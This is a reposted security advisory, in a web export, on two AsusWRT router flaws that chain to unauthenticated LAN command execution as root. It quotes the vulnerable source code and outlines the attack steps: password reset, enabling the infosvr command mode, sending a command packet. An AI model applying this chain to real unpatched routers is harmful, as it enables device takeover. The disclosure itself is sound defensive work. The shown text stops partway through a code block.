{"id":11196,"date":"2018-01-22T14:19:15","date_gmt":"2018-01-22T22:19:15","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4967\/"},"modified":"2018-01-22T14:19:15","modified_gmt":"2018-01-22T22:19:15","slug":"news-4967","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4967\/","title":{"rendered":"SSD Advisory \u2013 Hack2Win &#8211; Asus Unauthenticated LAN Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:50:36 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. <\/p>\n<p>AsusWRT is &#8220;THE POWERFUL USER-FRIENDLY INTERFACE &#8211; The enhanced ASUSWRT graphical user interface gives you easy access to the 30-second, 3-step web-based installation process. It\u2019s also where you can configure AiCloud 2.0 and all advanced options.
ASUSWRT is web-based, so it doesn\u2019t need a separate app, or restrict what you can change via mobile devices \u2014 you get full access to everything, from any device that can run a web browser&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Access bypass<\/li>\n<li>Configuration manipulation<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pedro Ribeiro (pedrib_at_gmail.com), has reported this vulnerability to
Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Asus were informed of the vulnerabilities and released patches to address them (version 3.0.0.4.384_10007).<\/p>\n<p>For more details: https:\/\/www.asus.com\/Static_WebPage\/ASUS-Product-Security-Advisory\/<br \/> <span id=\"more-3589\"><\/span><br \/> <strong>Vulnerabilities details<\/strong><br \/> The AsusWRT handle_request() code allows an unauthenticated user to perform a POST request for certain actions.<\/p>\n<p>AsusWRT_source\/router\/httpd\/httpd.c:<\/p>\n<div id=\"crayon-5a66636295033161758955\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">handle_request(void)\n{\n...\n\t\t\t\t\thandler-&gt;auth(auth_userid, auth_passwd, auth_realm);\n\t\t\t\t\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\n\n\t\t\t\t\tif (auth_result != 0)    \/\/ &lt;-- auth fails\n\t\t\t\t\t{\n\t\t\t\t\t\tif(strcasecmp(method, \"post\") == 0){\n\t\t\t\t\t\t\tif (handler-&gt;input) {\n\t\t\t\t\t\t\t\thandler-&gt;input(file, conn_fp, cl, boundary);    \/\/ &lt;-- but POST request is still processed\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\/\/if(!fromapp) http_logout(login_ip_tmp, cookies);\n\t\t\t\t\t\treturn;\n\t\t\t\t\t}\n...\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p>By POSTing to vpnupload.cgi, we invoke
do_vpnupload_post(), which sets NVRAM configuration values directly from the
request.<\/p>\n<p>AsusWRT_source\/router\/httpd\/web.c:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a6663629503c450872471\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> do_vpnupload_post(char *url, FILE *stream, int len, char *boundary)  
{  &#8230;  \t\tif (!strncasecmp(post_buf, &#8220;Content-Disposition:&#8221;, 20)) {  \t\t\tif(strstr(post_buf, &#8220;name=&#8221;file&#8221;&#8221;))  \t\t\t\tbreak;  \t\t\telse if(strstr(post_buf, &#8220;name=&#8221;&#8221;)) {  \t\t\t\toffset = strlen(post_buf);  \t\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);  \t\t\t\tlen -= strlen(post_buf) &#8211; offset;  \t\t\t\toffset = strlen(post_buf);  \t\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);  \t\t\t\tlen -= strlen(post_buf) &#8211; offset;  \t\t\t\tp = post_buf;  \t\t\t\tname = strstr(p, &#8220;&#8221;&#8221;) + 1;  \t\t\t\tp = strstr(name, &#8220;&#8221;&#8221;);  \t\t\t\tstrcpy(p++, &#8220;\u0000&#8221;);  \t\t\t\tvalue = strstr(p, &#8220;rnrn&#8221;) + 4;  \t\t\t\tp = strstr(value, &#8220;r&#8221;);  \t\t\t\tstrcpy(p, &#8220;\u0000&#8221;);  \t\t\t\t\/\/printf(&#8220;%s=%sn&#8221;, name, value);  \t\t\t\tnvram_set(name, value);  \t\t\t}  \t\t}  &#8230;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5a6663629503c450872471-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" 
id=\"crayon-5a6663629503c450872471-1\"><span class=\"crayon-e\">do_vpnupload_post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FILE *<\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">boundary<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-3\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-4\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">strncasecmp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Content-Disposition:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-5\"><span 
class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name=&#8221;file&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-6\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-7\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name=&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-8\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-9\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">fgets<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span 
class=\"crayon-o\">+<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MIN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-10\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-11\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5a6663629503c450872471-12\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">fgets<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MIN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-13\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-14\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post_buf<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-15\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-16\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-17\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\u0000&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-18\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;rnrn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-19\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;r&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-20\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\u0000&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-21\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;%s=%sn&#8221;, name, value);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-22\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">nvram_set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-23\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-24\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-25\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-26\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0035 seconds] -->  <\/p>\n<p>An attacker can trigger the vulnerabilities and reset the admin password. <\/p>\n<p>Once that is done, the attacker can login to the web interface with the new password, enable SSH, reboot the router and login via SSH.<\/p>\n<p>Another option is to abuse infosvr, which is a UDP daemon running on port 9999.<\/p>\n<p>The daemon has a command mode which is only enabled if ateCommand_flag is set to 1.<\/p>\n<p>This flag is only enabled in very special cases, but we can enable it using the VPN configuration upload technique described above.<\/p>\n<p>Once that is done, all we need to do is send a PKT_SYSCMD to infosvr.<\/p>\n<p>The daemon will read a command from the packet and execute it as root.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636295040817832852\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover 
overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Packet structure (from AsusWRT_source\/router\/shared\/iboxcom.h):  &#8211; Header    typedef struct iboxPKTEx    {      BYTE\t\tServiceID;      BYTE\t\tPacketType;      WORD\t\tOpCode;      DWORD \t\tInfo; \/\/ Or Transaction ID      BYTE\t\tMacAddress[6];      BYTE\t\tPassword[32];   \/\/NULL terminated string, string length:1~31, cannot be NULL string    } ibox_comm_pkt_hdr_ex;    &#8211; Body    typedef struct iboxPKTCmd    {      WORD\t\tlen;      BYTE\t\tcmd[420];    } PKT_SYSCMD;\t\t\/\/ total 422 bytes<\/textarea><\/div>\n<div 
class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" 
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-1\"><span class=\"crayon-e\">Packet <\/span><span class=\"crayon-e\">structure<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">AsusWRT_source<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">router<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shared<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iboxcom<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">h<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-2\"><span 